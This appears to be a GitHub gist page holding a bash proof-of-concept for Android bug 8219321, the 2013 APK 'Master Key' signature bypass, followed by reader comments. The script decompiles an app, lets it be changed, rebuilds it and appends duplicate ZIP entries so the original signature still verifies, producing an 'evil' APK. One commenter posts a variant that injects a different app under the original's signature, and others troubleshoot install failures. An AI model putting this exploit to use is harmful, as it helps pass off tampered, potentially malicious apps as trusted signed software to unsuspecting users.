Skip to content

Instantly share code, notes, and snippets.

@poliva
Created July 8, 2013 10:35
Show Gist options
  • Save poliva/36b0795ab79ad6f14fd8 to your computer and use it in GitHub Desktop.
Save poliva/36b0795ab79ad6f14fd8 to your computer and use it in GitHub Desktop.
Quick & dirty PoC for Android bug 8219321 discovered by BlueboxSec
#!/bin/bash
# PoC for Android bug 8219321 by @pof
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
#apktool d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/
unzip ../$APK
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-$APK
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"
@Fuzion24
Copy link

Fuzion24 commented Jul 9, 2013

https://github.com/Fuzion24/AndroidMasterKeys/ I built a slightly more resilient tool. This also makes sure not to duplicate files that exist in the original application as well as compress the added files. Pythons zip append in the above script will only add files as STORED (no compression).

@BrunoVernay
Copy link

The apktools option are here: https://code.google.com/p/android-apktool/source/browse/brut.apktool/apktool-cli/src/main/java/brut/apktool/Main.java

  • d: decompile
  • b: build

So you simply decompile, modify and rebuild and ... Android does not recompute the hash ??

@poliva
Copy link
Author

poliva commented Jul 11, 2013

@BrunoVernay I'm duplicating entries inside the apk (original entries + rebuilt entries). The hashes in META-INF folder are from the original signed files, which are checked for signature, but the ones that end up being installed on the device are the duplicated ones.

@jbforristal
Copy link

Have you checked to see exactly which modified/duplicate files are getting installed & actually used? For example, try explicitly changing the AndroidManifest.xml.

@qjerome
Copy link

qjerome commented Jul 16, 2013

Hi all, I modified the script so that it tackes two different files as parameters. This scenario is more realistic if we really want to leverage an attack with this technique. However, in doing so I was not able to install the repackaged application because of the "Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES]" error raised by ADB. But why this works when the two applications are the same (I verified that it does not raise any error) ? One explaination would be that in order to verify that the application is well signed, the package manager computes a hash of every file in the APK and then verifies that the hash of this list of hash is well signed. This is possible that the implementation manages the case where duplicated files are in the package. Thus two same hashes would be in the list only once and thus create a valid signature. I don't know how it is implemented but I would have done so. But to conclude, according to my experiments, this flaw can not be leveraged by attackers to sign malicious applications with certificates of benign applications. My Cyanogen version is 7.2.0 for WildfireS (not official).

NB: please let me know if I have made a mistake

Hereafter the code modified:

!/bin/bash

if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
echo "Modify files, when done type 'exit'"
cd out

bash

cd ..
java -jar apktool.jar b out out.apk
mkdir tmp
cd tmp/
APK=../$2
unzip $APK
mv ../out.apk .
cat >poc.py <<-EOF

!/usr/bin/python

import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in find . -type f |egrep -v "(poc.py|out.apk)" ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-app.apk
cd ..
rm -rf tmp out
echo "Modified APK: evil-app"

@palani95
Copy link

Found a open source scanner to detect this in Google code,

http://code.google.com/p/bluebox-3xp10it-scanner/

@cvem
Copy link

cvem commented Jul 21, 2013

@poliva Thanks for sharing! :) How can you add duplicate entries inside the apk? Thanks in advance!

@poliva
Copy link
Author

poliva commented Jul 22, 2013

here's an example that can inject contents of an APK into another:
https://github.com/poliva/random-scripts/blob/master/android/masterkey-apk-inject.sh

@cvem
Copy link

cvem commented Jul 27, 2013

@poliva Thanks! :)

@esotericnomen
Copy link

I tried with script. And also, ive tried adding duplicate classes.dex alone in the APK and trying to install on device, but unable to install.

Failure [INSTALL_PARSE_FAILED_CERTIFICATE_ENCODING]
Even with the old android, versions. Any idea on what am i missing?

@huangtaowy
Copy link

@esotericnomen have you solved the problem ?

@xiaoxiong0930
Copy link

I have also met this problem.Is there any solutions?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment